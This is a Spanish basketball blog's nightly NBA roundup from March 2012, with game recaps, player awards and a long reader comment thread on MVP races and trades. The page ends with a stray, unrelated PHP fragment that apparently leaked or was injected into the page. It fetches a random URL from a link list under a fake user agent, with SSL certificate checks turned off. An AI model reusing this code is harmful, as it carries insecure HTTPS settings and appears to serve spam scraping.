La Crónica: Rodney Stuckey saluda a Kuester

07 de March de 2012 por TheDeerHunter

¡Qué bonita es la amistad! Esa amistad que un día germina como una flor que luego se cuida con interés y cariño. Así es la amistad entre John Kuester y Rodney Stuckey. El viejo técnico tuvo a bien hacer una visita a sus ex-pupilos y Stuckey se la agradeció poniendo de manifiesto las bondades de sus sistemas defensivos, metiéndoselas de todos los colores y olores. Seguro que lo hizo sin ninguna acritud. Sería casualidad que hiciera anoche su mejor partido del año. Me llama la atención que los medios USAnianos destaquen que los Pistons superaran la heroicidad de Kobe. La hubo sí, anotó un maravilloso clutch bajo una magistral defensa de Prince para forzar la prórroga, pero no fue una buena actuación por su parte. Es triste reiterar que estando Pau y Bynum inmensos y él fallón no cambie un ápice el guión. Más triste es que la rotación de Lakers haga sentir envidia de la de Pistons, pensada para ni remotamente acercarse a puestos de playoffs (85-88).

Pero ya se sabe que mal de muchos consuelo de tontos y hoy sería peor ser seguidor de Orlando. Anoche se llevaban un castigo terrible en una plaza tan “inexpugnable” como es Charlotte. Resucitó Maggette y Biyombo jerció de Supermán (84-100).

Los Celtics también necesitaron de prórroga para doblegar a los Rockets. Después de todo el partido a remolque hubieran podido cerrar el choque en el último cuarto pero Rondo falló una de las bandejas más increíbles que yo haya visto y sus rivales aprovecharon el regalo. La mejor versión de Paul Pierce facilitó salir airosos del brete en el que se habían metido (92-97).

En Miami, volvía Bosh pero se lesionaba Wade, y a pesar de eso Miami trituró a unos Nets totalmente desquiciados (78-108). Para desquicie el de Melo, que ya comentaba alguien anoche por aquí. Los Mavs apenas sudaron para ganar a los Knicks en un partido malo de consideración. Un 14-0 en el último cuarto y a correr (85-95).

Por último, cuando Josh Smith despliega su mejor baloncesto su equipo lo agradece. Meritoria victoria la de anoche en Indiana (101-96). Por desgracia lo primero no suele suceder con la frecuencia que cabría esperar.

PREMIOS

MVP: Rodney Stuckey se convirtió anoche en una máquina de anotar. De hecho, no hizo nada más. 34 puntos, 1 rebotes y 1 asistencias para el jugador de los Pistons. Josh Smith colaboró de manera más completa en la victoria de los Hawks frente los Pacers con 27 puntos y 9 rebotes.

Rookie: 10 puntos, 15 rebotes y 7 tapones para Bismack Biyombo. Gran tarjeta de visita la que dejó el congoleño a Dwight Howard.

Sorpresa: Hacía tiempo que no veía a Corey Maggette tan acertado. 27 puntos con un 9 de 17 en tiro, complementados con 7 rebotes y victoria de su equipo.

Decepción: Muy mal día para Carmelo Anthony que se quedó en un 2 de 12. No fue mucho mejor el de Brandon Knight (0 de 6) o Greg Monroe (1 de 10). Al menos este último capturó 15 rebotes.

Esfuerzo en vano: El partidazo de las torres de los Lakers quedó sin recompensa. Andrew Bynum anotó 30 puntos , capturó 14 rebotes y puso 3 tapones. Por su parte, Pau Gasol se fue a los 20 puntos, 10 rebotes, 6 asistencias y 4 tapones.

Imágenes | AP Photos / Getty Images

Comenta

39 comentarios a esta entrada

  1. Ru dice:
    #1

    Joder con Biyombo,jugando con asiduidad y haciendo buenos números,no esperaba eso.Lo mismo con Ayón,el mexicano de los Hornets(hoy no jugó).Yo no esperaba que jugaran tanto los ACB sinceramente.Ha sonado también Freeland para el año que viene en Portland.¿Creeís que con las novedades económicas que deparó el lockout cada vez veamos más jugadores ya maduros en Europa que dan el salto?Es una sensación que tengo,jugadores ya hechos y que a priori no deben cobrar demasiado…

    El fallo de Rondo es increible,se le sigue cruzando el cable muy de vez en cuando y deja errores mayúsculos…pero es un jugadorazo.

    Y viene del anterior post

    melo15:
    La gran decepcion del año junto a Turner, Wesley tendria que dejar de tirarse triple y aprovechar su fisico para penetrar. Creeis que tienen futuro Wes y turner?
    PD: Faried el nuevo Rodman

    Wesley no lo veo aprovechable,es más,para mí guarda gran parecido con su compañero Anthony Randolph,no en cuanto a juego ya que ocupan posiciones distintas pero si en el sentido de que se nos presenta un jugador con un potencial terrible -probablemente por su físico- pero con poca capacidad de adaptación,debido a que no sabe trasladar su juego a la NBA -físico again-.

    En cuanto a Evan Turner,uno de mis favoritos de la NCAA cuando jugaba en Ohio State y uno de mis jugadores en la liga virual que disputo,así que me interesa que le vaya bien xDDD ,necesita minutos y un entrenador que lo desarrolle y tal como está establecida la rotación de los 76ers dudo muchísimo que consiga demostrar algo más de lo que ha sido capaz de mostrar hasta ahora.Esto es: 10 actuaciones ni fu ni fa y 1 partido donde hace 20-5-5.Calidad tiene pero hay que achacarle al jugador su conformismo.A este le inyectas una gota de la sangre de Kobe y le haces un favor enorme.En fin,un traspaso a un equipo donde juegue de titular sería muy beneficioso para él.

    HisRoyalAirness:
    Cada vez veo a los Wolves más serios, acabo de terminar de ver el partido y lo de Adelman es increíble. Beasley está centradoy participando en la circulación de balón, esto unido a su talento hace que sea uno de los mejores sextos hombres que hay. Derrick Williams empieza a enchufarse y Pekovic es un fenómeno.
    Los veo con muchas opciones de PO.
    Del partido de Love…qué decir. Lo que digo siempre: mitológico. De todas las formas y colores y qué manera de rebotear, menudo asesino. Las pesca como si fueran barras de pan.
    Ricky está en su particular Rookie Wall pero si consigue superarlo para el arreón final son equipo de postemporada

    Ahora mismo para mí,a la hora de MVP LeBron y Love,y un escalón por debajo Durant.No sé cómo estará el ránking de eficiencia pero no creo que difiera mucho.Y Adelman entrenador del año.

    Y sobre Derrick Williams,el parón del AllStar le ha sentado fenomenal,le ves la cara y tiene una confianza encima que le hace tirarse tiros con defensores delante y el pavo las mete.Muy buen jugador.

      Citar

  2. nba dice:
    #2

    Deer, me parece que ya has dejado todo dicho en el resumen de Lakers-Pistons , nada que añadir

      Citar

  3. rumbero dice:
    #3

    Que bestia Biyombo! Parece que ahora que el zampabollos de Diaw ha dicho que le dejen irse va a tener bastante más protagonismo. Mejor para él y para Bobcats. Ya tardan los de Marca en bautizarlo como “Blockombo” o algo por el estilo.
    Y esos Knicks…parece que con el equipo al completo y contra rivales de entidad les sigue costando horrores llevarse partidos.

    PD: El otro dia hablamaos de posibles MVP, pero con el señor James a este nivel yo lo veo como claro favorito. 21/9/6 en menos de media horita. Fácil…

      Citar

  4. TheDeerHunter dice:
    #4

    El otro día en la ESPN comentaban que la temporada de LeBron está siendo la mejor temporada individual de nadie en toda la historia… eso sí, lo hacían en base al criterio PER de Hollinger y por ahí habría que discutir algunas cosas.
    De todas formas para mí la cuestión no existe. MVP para LeBron claramente.

      Citar

  5. Pop dice:
    #5

    TheDeerHunter: El otro día en la ESPN comentaban que la temporada de LeBron está siendo la mejor temporada individual de nadie en toda la historia… eso sí, lo hacían en base al criterio PER de Hollinger y por ahí habría que discutir algunas cosas.De todas formas para mí la cuestión no existe. MVP para LeBron claramente.

    ¿La mejor temporada individual de la historia? ¿Mejor que los 50 pts + 25 reb /partido o los 24 pts/24reb/8 asistencias de Wilt?

      Citar

  6. Rompe dice:
    #6

    Es increíble que un jugador en esa posición tenga los porcentajes que está teniendo, habitual en los pivots. Y está empequeñeciendo a Wade, casi nada…

      Citar

  7. Txusma dice:
    #7

    Pop: ¿La mejor temporada individual de la historia? ¿Mejor que los 50 pts + 25 reb /partido o los 24 pts/24reb/8 asistencias de Wilt?

    Supongo q se refieren a la historia cercana que empieza más o menos desde que se instauró la línea de 3, en 1979.

      Citar

  8. Esteban dice:
    #8

    nadie vio a los knicks ayer?

    q alguien me explique a donde va esta franquicia, tienen un enorme conjunto coral, para acompañar a su supuesta superestrella, los knicks con lebron, serian un top 5 de la liga, pero melo no es lebron, ya nisiquiera es melo, hay q llamarlo anthony, es cierto que viene de una lesion, pero parece decididamente un mal jugador, erra todo lo que tira, cuando penetra loi tapan, comete foul en ataque y no baja rebotes pese a su tamaño

    su ego, lo lleva a tomar desiciones, tirar sobre la marca en vez de rolar el balon, hubo un momento anoche donde quedo un tal NOVAK LIBRE!!!! para tirar de tres (hostia, este tio tiene futuro en la liga, no quiero imaginar lo que lastimaria y ayudaria si jugara en el thunder) y anthony prefirio forzar un tiro sobre la marca casi de tres puntos que apenas golpeo el aro

    ayer pensaba que ellis por carmelo podria ser un buen trade mas elecciones, bueno ahora lo creo mas, si bien melo es un cerrador de partidos genial, durante los 47 minutos hace todo lo posible para que el poartido no termine cerrado

      Citar

  9. Txusma dice:
    #9

    Txusma: Supongo q se refieren a la historia cercana que empieza más o menos desde que se instauró la línea de 3, en 1979.

    Acabo de hacer una consulta en basketball-reference y no. Aún teniendo en cuenta las temporadas de Chamberlain, el PER de Lebron este año es el más alto de la historia (más de 33 puntos). Chmaberlain no llegó nunca a los 32.
    Hay q tener en cuenta que el PER tiene en cuenta los minutos jugados y también el ritmo de juego del equipo. Vamos, q corrige el hecho que Chamberlain llegó a jugar más de 48 minutos por partido y que en aquella época los equipos anotaban mucho más que ahora.

      Citar

  10. Nacho dice:
    #10

    Sin haber seguido mucho a sus equipos (y con el prejuicio que tengo a James), no sé que tiene el de Miami que no tenga Durant (bueno, sí, este finaliza partidos).
    Sobre lo que comenta Rompe sobre los porcentajes de James, creo que es porque tira menos de tres y mete muchas para abajo. Con Wade tiene lo que le faltaba en los Cav’s para finalizar más contras, ¿me equivoco? Supongo que eso repercute en sus porcentajes (lo que no le quita mérito, ojo)
    Pero vamos, no puedo con él. Y quiero una final Miami Lakers (si sigue Pau) para que éste le de la hostia que no le dio el otro día.

      Citar

  11. Esteban dice:
    #11

    q pasa con los equipos de LA, q no se mueven!!!

    los clippers, sin billups apenas pueden ser un equipo de segunda ronda, solo cp3 puyede finalizar partidos alli, no es poco, pero no es suficiente para una final de conferencia, a menos que fichen algunos jugadores y levante butler

    los lakers son un caso raro, por q kobe quiere ser campeon, tienen todo a disposicion para ser candidatos, aceptando la oferta de los wolves por beasley (creo que dijieron que no pra sacar un mejor precio sobre el limite, no dar su primera ronda) y fichar un base, cualquiera! incluso arenas, con beasley y arenas, puede resultar bien o no, pero por lo menos habria alguna esperanza que engranen y ser candidatos nuevamente, hoy no son candidatos a nada

      Citar

  12. Txusma dice:
    #12

    Pues si Kobe quiere ser campeón que pague él el salario de Beasley. El nuevo convenio castiga y mucho pasarse del límite salarial y los Lakers tienen claro que ya no pueden gastar como lo hacían antes. Por eso dejaron ir a Odom y por eso no aceptaron lo de Beasley. Y lo que digo, si Kobe está tan interesado en que se refuerce el equipo que no cobre los 25 kilos que cobra, que cobre un pelín menos.

      Citar

  13. HisRoyalAirness dice:
    #13

    Bueno, eso de que está empequeñeciendo a Wade… me basta con acordarme de los promedios de cada uno en las finales y se acabó. Es más, Wade tenía mejores números que Nowitzki.

    Por cierto, estoy con Deer, a mí el PER de Hollinger me parece una patraña bastante freak y muy rebuscada. Porque vamos, la temporada del triple-doble de Oscar Robertson o la de los 37-5-5-3 robos de Jordan ( o la siguiente, con 35 ppp y un 53% de acierto) vienen y le mean en la boca a Lebron. y ya no me meto en Russell, Wilt o Kareem porque sería un descojone.

    Al margen de esto para mí es el MVP sin discusión pero creo que la temporada de Love está siendo un espectáculo, con MUCHO menos apoyo y, no me hartaré de repetirlo, en la Conferencia Oeste. Es más, los Wolves estarían de sextos en el Este.
    James es MVP, no lo discuto, pero Love tiene todo el derecho a entrar en las quinielas

      Citar

  14. Ru dice:
    #14

    Esteban:
    q pasa con los equipos de LA, q no se mueven!!!

    Se dice,se rumorea,que Clippers anda detrás de Ray Allen y Jamal Crawford.Y en sus vecinos está más calmada la cosa pero con derrotas sonrojantes como hoy contra Pistons,o contra Bobcats(Orlando) en el “caso Howard” cualquiera se aventura a pronosticar.

      Citar

  15. Sancho88 dice:
    #15

    Txusma:
    Pues si Kobe quiere ser campeón que pague él el salario de Beasley. El nuevo convenio castiga y mucho pasarse del límite salarial y los Lakers tienen claro que ya no pueden gastar como lo hacían antes. Por eso dejaron ir a Odom y por eso no aceptaron lo de Beasley.Y lo que digo, si Kobe está tan interesado en que se refuerce el equipo que no cobre los 25 kilos que cobra, que cobre un pelín menos.

    También sería un detalle quitarse de en medio los 15 kilos de Fisher+MWP+Walton, no crees?

      Citar

  16. Esteban dice:
    #16

    Segun tengo entendido este año las consecuencias del nuevo convenio son minimas, muy parecidas las del año pasado, por la razon que todos lops contratos se firmaron. Con el convenio anterior y bajo sus normas

    Los 3 dolares por cada dolar excedido en el imp de lujo son para dentro de 2 años, este año sigue rigiendo dos por uno, por lo q no entiendo el ataque de austerismo de el dueño de los lakers

    ademas cuando los lakers han ganado cosas siempre han estado muy muy excedido, yo diria q se excedan ahora mientras tienen chances de ganar algo y cuando kobe no de mas reeconstruir

      Citar

  17. Denise dice:
    #17

    Bueno, estoy leyendo un trade Gasol por Lowry y Scola. Espero que no!!!, sería un timo a los Rockets, y hasta le daría posibilidades de anillo a Lakers. El GM de los Rockets sería muy tonto si se desprendiese de Lowry, con el temporadon que está haciendo con 5,7 kilos que cobra actualmente y con contrato hasta 2014.
    Un Scola-Dragic-Flynn (expiring) -Tarrence Williams por Pau sí sería más equitativo para ambos. Y a los Rockets le quedaría un 5 inicial apañado con Lowry, Martin, Parsons, Pau y Dalembert + muchos millones para fichar agentes libres

      Citar

  18. Sancho88 dice:
    #18

    Denise:
    Bueno, estoy leyendo un trade Gasol por Lowry y Scola. Espero que no!!!, sería un timo a los Rockets, y hasta le daría posibilidades de anillo a Lakers. El GM de los Rockets sería muy tonto si se desprendiese de Lowry, con el temporadon que está haciendo con 5,7 kilos que cobra actualmente y con contrato hasta 2014.
    Un Scola-Dragic-Flynn (expiring) -Tarrence Williams por Pau sí sería más equitativo para ambos. Y a los Rockets le quedaría un 5 inicial apañado con Lowry, Martin, Parsons, Pau y Dalembert + muchos millones para fichar agentes libres

    Totalmente de acuerdo. Si Houston hace esa bobada, que se den por perdidos para entrar en playoffs… sería una gran cagada

      Citar

  19. Denise dice:
    #19

    Sancho88: Totalmente de acuerdo. Si Houston hace esa bobada, que se den por perdidos para entrar en playoffs… sería una gran cagada

    Ya no solo por los Playoffs de este año, sino por el futuro de la franquicia a corto plazo. Es que tienen ahora mismo a un base a nivel All-Star cobrando unos 6 kilos ésta y las 2 proximas temporadas. El unico jugador ahora mismo intraspasable de Rockets en relacion rendimiento/salario sería Lowry.

      Citar

  20. Esteban dice:
    #20

    No me parece tan timo, gasol tiene su valor y no es bajo, un juego interior. Gasol y dalembert mas martin por fuera es una buena base, ademas que tendrian espacio para algunos agentes libres

    Yo me arriesgaria, gasol en houston tirando se puede ir hasta los 25 ppp, y seria atractivo para alguien como allen, smith o nash a principio de año

    A los lakers le saldria bien, scola es menos q gasol, pero puede anotar tamb y lowry es un futuro all dtar, creo q este trade, mas beasley para ayudar a scola a reemplazar a gasol, no solo mejorarian este año sino q renovaroan el roster para años venideros

      Citar

  21. Viva_Dirk dice:
    #21

    Llego algo tarde pero sin buscar mucho encuentro varias temporadas de Jordan mejores que la de Lebron en cuanto a números se refiere.

    Y si lo comparamos con Love yo no sabria muy bien con cual quedarme.

      Citar

  22. futurman dice:
    #22

    ¿Nadie mete en las quinielas para MVP a Kobe? Para mi sigue siendo un jugador definitivo, lo que pasa y es que la gente le tiene muy visto ya…

      Citar

  23. Sancho88 dice:
    #23

    No, un mvp tiene que hacer a su equipo ganador

      Citar

  24. Viva_Dirk dice:
    #24

    Ganador de la liga regular? Hay muchos MVPs que no han ganado la liga regular.

      Citar

  25. Pop dice:
    #25

    Bueno, por si quedaba alguna duda… Kevin Love es Dios, en el primer cuarto del Min-Por.

      Citar

  26. Jones dice:
    #26

    Y los lakers dan vergüenza ajena. No he visto un mayor ridículo que el de parecer una banda mayor que los Washington Wizards. Reto conseguido.

      Citar

  27. Sancho88 dice:
    #27

    Yo repito lo que dije hace algunas semanas. 9/31 no tenía cojones a hacerlo con el señor Jackson, o 6/30 y pico que se hizo también este año. No concibo como muchos amantes del basket dicen… no, que se tire todo lo que quiera, tiene derecho. Pues eso, que haga lo que quiera, su equipo seguirá perdiendo gracias a su actitud

      Citar

  28. Sancho88 dice:
    #28

    Y como diría el abuelete de la fabada asturiana… Y los Blazers qué? otra vez por debajo del 50%? ajajaaajj

      Citar

  29. Sancho88 dice:
    #29

    Por cierto, no me hagáis ni puto caso, pero he soñado que los Celtics fichaban a Chris Kaman. Queda dicho, pero no es coña. Soy tan friki que además os cuento que me acuerdo de suerte porque yo para esto soy muy friki, y les cuento los traspasos a mis hermanos, que no les interesa mucho el percal, pero yo se lo cuento igualmente, y entonces he soñado que se lo comentaba a mi brother mayor…

      Citar

  30. Sancho88 dice:
    #30

    ISAIAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH!!!!! QUÉ TÍO MÁS GRANDE. Roba el balón cuando en un saque de banda cuando quedan 10 segundos, y le mete un pase medido a Salmons para la bandeja. Kings ganan por 1 gracias a esa acción. Madre mía, y pensar que este tío no es ni segunda ronda del draft… Número 60, pero tiene muchos huevos. En defensa, de lo mejor del equipo, y en ataque es inteligente, tiene buena mano… tiene futuro. Cuando él está en la pista el equipo juega muchísimo mejor. Para mí lo más impactante sin duda de la temporada es ver las gradas totalmente llenas. El Here we stay! que se ha creado en Sacramento, y la pasión por este equipo, que probablemente sea de los peores de la liga, no por futuro pero sí por presente, es brutal. Aunque sea una ciudad pequeñita, merecen tener equipo. En serio, penúltimos del Oeste y todo lleno. La imagen es brutal si la comparas con lo que pasa en los partidos de los Bobcats, por poner un ejemplo… GO KINGS! y eso que no jugaba Cousins por intoxicación alimentaria… qué coño se habrá comido el chaval, jaajaj

      Citar

  31. Denise dice:
    #31

    Sancho88:
    Yo repito lo que dije hace algunas semanas. 9/31 no tenía cojones a hacerlo con el señor Jackson, o 6/30 y pico que se hizo también este año. No concibo como muchos amantes del basket dicen… no, que se tire todo lo que quiera, tiene derecho. Pues eso, que haga lo que quiera, su equipo seguirá perdiendo gracias a su actitud

    Bueno…yo tambien he visto partidos con Tito Phil de 9/30 y similares y Kobe echando el partido a la basura…
    Bueno, lo dejo aqui y ya le metere mas caña a Lakers en la cronica de hoy

      Citar

  32. Denise dice:
    #32

    Sancho88:
    Y como diría el abuelete de la fabada asturiana… Y los Blazers qué? otra vez por debajo del 50%? ajajaaajj

    Pero entre que odiais a Mcmillan y sobrevalorais la plantilla de los Blazers….

    En los Blazers solo valen Felton, Aldridge, Wallace, Batum y Mathews. El resto, como diría Maldini, bacalá infame. Jamal Crawford y Camby ya no son ni la sombra de lo que eran. Y el resto…Przybilla, Babbit, Craig Smith, Kurt Thomas…vaya banda. Le exigis demasiado a los Blazers simplemente por el resentimiento hacia Mcmillan.
    El año que viene tienen bastante espacio salarial, a ver si pudieran formar un buen equipo, y que le respeten las lesiones.

      Citar

  33. Sancho88 dice:
    #33

    Bueno, pero Phil le miraba jodidamente enfadado después de esos partidos, y Brown, en cambio, solamente se atreve a darle palmaditas en la espalda. Esa es la diferencia, y no me negarás que Bryant respetaba como mil veces más a Phil que a este individuo, no?

    Sobre los Blazers, reconozco que tengo odio puro hacia el equipo ahora mismo. Pero ojo, no desde siempre. Yo me lo pasaba como un gorrino en un lodazal en la época de Bonzito Wells, Sabonis, el pistolero Steve Smith, Shawn Kemp, Scottie Pippen, Dale Davis, Damon Stoudamire, Sheed, etc. Eran uno de mis equipos preferidos, en serio. Pero creo que McMillan es un inepto, y si no, dame algún argumento para respetarle como entrenador. Un solo argumento y me callaré sobre él.

    Por cierto, tengo calentito el artículo de los Kings que prometí. A ver si hoy lo puedo terminar. Te lo pasaré al mail Txus. Avanzo que casi es una monografía sobre las andanzas de los Maloof. Pero en serio, no sabéis lo peculiares que son estos tipos. En un equipo en el que Tyreke es amigo de la muerte de Charlie Sheen, y quedan para jugar a la play, para ver top gear, etc. etc. (luego Tyreke se flipa y se pone a 210 por hora, jajaja), os podéis imaginar que si hace eso un jugador, lo que harán sus dueños. Pues os lo contaré en el artículo

      Citar

  34. nba dice:
    #34

    Y Mr. mandarina cogio su fusil …, esta visto que es incapaz de reconocer que cuando no esta acertado es mejor pasar el balon a Pau-Bynum que al menos habra mas probabilidades de acertar, pero no , vamos como se puede perder contra Wizards, menuda caraja

      Citar

  35. GreenPride dice:
    #35

    Bueno pues del Celtics-Rockets señalar que a veces parece mentira los partidos que sacan adelante los Celtics jugando de locales. Cuando todo parece indicar que se van a hundir, hacen un par de defensas, meten un par de ellas y en un final apretado acaban sacando el partido. No estarán para ganar a Heat o Bulls pero yo sigo emocionándome viéndoles jugar. A pesar de que la bandeja que falla Rondo para decidir el partido es una de las jugadas más tontas que haya visto.
    Esta madrugada el cansancio de viaje+Back to Back les ha pasado factura y les han metido de 30 en Philly. Los verdes sufren todo cuando juegan sin descanso y contra equipos físicos.
    En la otra orilla, los Lakers tampoco están mucho mejor que digamos. ¿Dejar escapar 21 puntos de ventaja contra los Wizards? Madre mía…. Es verdad que Kobe empieza a tirar y le da igual si las mete o no que el sigue y que tendrían que jugar más con los interiores pero yo creo que lo de los Lakers tiene difícil arreglo en cuanto a su ataque. Jugarán así siempre y más con Mike Brown en el banquillo.

      Citar

  36. Denise dice:
    #36

    Si a mi McMillan tampoco es que sea santo de mi devoción, simplemente que algunos lo crucificais y le exigis el anillo o una final de conferencia cuando nunca ha tenido un equipo top 6 de la NBA y siempre ha tenido una importante plaga de lesiones en sus equipos.

    No soy partidario de crucificar a nadie, pero más habria que hacerlo a George Karl, o a Mike D’Antoni, que en los ultimos años han tenido equipazos y nunca han sido capaces de hacer algo.

      Citar

  37. Viva_Dirk dice:
    #37

    Denise: Pero entre que odiais a Mcmillan y sobrevalorais la plantilla de los Blazers….

    En los Blazers solo valen Felton, Aldridge, Wallace, Batum y Mathews. El resto, como diría Maldini, bacalá infame. Jamal Crawford y Camby ya no son ni la sombra de lo que eran. Y el resto…Przybilla, Babbit, Craig Smith, Kurt Thomas…vaya banda. Le exigis demasiado a los Blazers simplemente por el resentimiento hacia Mcmillan.
    El año que viene tienen bastante espacio salarial, a ver si pudieran formar un buen equipo, y que le respeten las lesiones.

    Joder, Felton-Matthews-Batum-Wallace-Aldridge, con Crawford y Camby como primeros recambios, a ver en que equipo encuentras dos suplentes mejores. Y luego Przybilla, Babbit, Craig Smith, Kurt Thomas, anda que no jugarian minutos en otros equipos que estan mejor clasificados que los Blazers.

      Citar

  38. TheDeerHunter dice:
    #38

    Lo del año que viene en el caso de McMillan, no sé porqué pero ya se ha convertido en mantra.
    ¿Será posible que los Blazers esperen al año que viene una década más?

    Ah… y lo de la final de conferencia o el anillo yo sólo se lo he oido a ti ahora, Denise. So cachondo.

    Pero vamos, como he dicho varias veces lo de pedir segunda ronda ya se sabía que es una quimera para McMillan; pedir playoffs ahora es demasiado para esa plantilla bacalá que tú dices (no sé porqué pero todo el mundo parece bacalá cuando lo dirije McMillan) y cuando les pasen los Kings diremos que ese es su sitio natural. Qué barato va el pescado. Con ese nivel de exigencia es normal que pienses que odiamos a McMillan, o le tenemos resentimiento.
    Señalar sus hitos reales se confunde con animadversión. Qué dirías si le negara sus logros objetivos como haces tú con AI (y con tantos otros)

    Mi gratitud porque siga en Portland puedo asegurar que es infinita, pero no me pidas que me vaya con Mr. Caraseta de copas. (Suponiendo que McMillan salga alguna vez de copas, que no parece…)

      Citar

  39. Ekos dice:
    #39

    ¿Y Lin? Creo que su efecto ha pasado. Sobre el debate McMillan, es cierto que ha tenido mala suerte con las lesiones, ¿pero acaso no tiene un equipo para llegar lejos en PO? Yo creo que sí, quizás falte un jugador-franquicia como Roy que tire del equipo en los momento decisivos, pero puede llegar a semifinales de conferencia perfectamente.

    Y ojo, McMillan no me parece mal entrenador.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>